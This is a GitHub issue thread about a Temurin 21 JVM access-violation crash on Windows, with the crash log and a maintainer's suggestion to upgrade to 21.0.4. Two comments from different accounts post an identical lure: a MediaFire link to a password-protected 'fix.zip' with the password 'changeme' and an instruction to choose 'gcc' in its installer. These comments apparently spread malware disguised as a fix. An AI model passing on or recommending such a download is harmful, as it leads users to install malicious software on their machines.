### ISSUE TITLE
A fatal error has been detected by the Java Runtime Environment:

### ISSUE THREAD

**Issue by spyda96** [adoptium/adoptium-support#1157]
### Please provide a brief summary of the bug

Command Line: -Djna.nosys=true -Dsun.awt.noerasebackground=true -Duser.language=en -Xmx16384m -Xms256m -XX:+UseG1GC -Xlog:gc*=off --add-opens=java.base/java.lang=ALL-UNNAMED --add-opens=java.base/java.io=ALL-UNNAMED --add-opens=java.base/java.math=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED --add-opens=java.base/java.util.concurrent=ALL-UNNAMED --add-opens=java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.text=ALL-UNNAMED --add-opens=java.desktop/java.awt=ALL-UNNAMED --add-opens=java.desktop/java.awt.color=ALL-UNNAMED --add-opens=java.desktop/sun.awt.windows=ALL-UNNAMED --add-opens=java.desktop/java.awt.peer=ALL-UNNAMED --add-opens=java.desktop/com.sun.java.swing=ALL-UNNAMED --add-opens=java.prefs/java.util.prefs=ALL-UNNAMED 

### Did you test with the latest update version?

- [x] Yes

### Please provide steps to reproduce where possible

Just running normal with recording all open instruments

### Expected Results

No crashes 

### Actual Results

Crashes and shuts down

### What Java Version are you using?

JRE version: OpenJDK Runtime Environment Temurin-21+35 (21.0+35) (build 21+35-LTS)

### What is your operating system and platform?

Host: 13th Gen Intel(R) Core(TM) i9-13900K, 32 cores, 128G,  Windows 11 , 64 bit Build 22621 (10.0.22621.3958)
Time: Sun Aug 25 22:45:58 2024 Pacific Daylight Time elapsed time: 26127.452686 seconds (0d 7h 15m 27s)

### Relevant log output

#
# A fatal error has been detected by the Java Runtime Environment:
#
#  EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x00007ffea5a2383d, pid=35972, tid=101948
#
# JRE version: OpenJDK Runtime Environment Temurin-21+35 (21.0+35) (build 21+35-LTS)
# Java VM: OpenJDK 64-Bit Server VM Temurin-21+35 (21+35-LTS, mixed mode, sharing, tiered, compressed oops, compressed class ptrs, g1 gc, windows-amd64)
# Problematic frame:
# V  [jvm.dll+0x35383d]
#
# No core dump will be written. Minidumps are not enabled by default on client versions of Windows
#
# If you would like to submit a bug report, please visit:
#   https://github.com/adoptium/adoptium-support/issues

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by karianna** [comment]
@spyda96 Please try with the latest 21.0.4

**Comment by spyda96** [comment]
Ok
